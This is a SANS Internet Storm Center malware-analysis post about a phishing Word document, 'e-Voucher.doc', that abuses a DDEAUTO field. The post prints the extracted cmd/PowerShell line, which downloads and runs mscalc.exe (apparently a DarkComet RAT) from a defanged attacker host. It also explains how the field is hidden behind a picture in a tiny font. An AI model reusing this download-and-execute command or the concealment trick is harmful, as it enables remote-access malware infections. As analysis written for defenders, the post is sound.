The document was part of a phishing campaign and delivered as "e-Voucher.doc" (SHA256:de966b0d005dda776a6104f999f294d62c5b1f6b6e5c6f79de5135ec66ba4ee4) with a VT score of only 12/62[2]. Are we facing a new wave of such documents? I searched for similar documents on VT for the last 90 days and spotted only 5 files:

Let's have a look at this sample. Because DDE is used, there is no macro involved:

remnux@remnux:/MalwareZoo/20210218$ e-Voucher.doc 1: 114 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 4096 '\x05SummaryInformation' 4: 7791 '1Table' 5: 4096 'Data' 6: 17502 'WordDocument'

Do we have interesting strings present in the document?

remnux@remnux:/MalwareZoo/20210218$ strings -n 30 e-Voucher.doc | less ddeauto "c:\\\\microsoft\\\\office\\\\word\\\\document\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\cmd.exe" "/c powershell.exe (new-object' htt p://','%temp%\\mscalc.exe');start-process '%temp%\\mscalc.exe'" \* mergeformat theme/theme/_rels/themeManager.xml.rels theme/theme/themeManager.xmlPK theme/theme/_rels/themeManager.xml.relsPK <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <a:clrMap xmlns:a="" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

You can see the magic word "DDEAUTO" followed by a long command line. But how does it work from a Word processing perspective? When you open the document, you see a classic notification asking you to enable content:

The method used to create DDE links is to work with "fields". You can add fields in a Word document. They may of different information types but, in this case, the most useful is "formula". The attacker tried to hide the form behind the picture by using a very small font size:

By inspecting the field and editing its content, we found the same strings as seen above:

Here is a dump of the Powershell command:

c:\microsoft\office\word\document\..\..\..\..\windows\system32\cmd.exe" "/c powershell.exe (new-object'hxxp://fullhash[.]cloud/tmpl_c/mscalc.exe','%temp%\\mscalc.exe');start-process '%temp%\\mscalc.exe'

The targeted user will have to allow the execution of this command but the document remains very small, macro-less and detected by a low number of antivirus solutions. About the malware (SHA256:01b9193e59e2e91c749bd90201eee08ea80d8ddf6f138ff3b70fc69c95e2a75c), it seems to be a Darkcomet RAT[3].


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.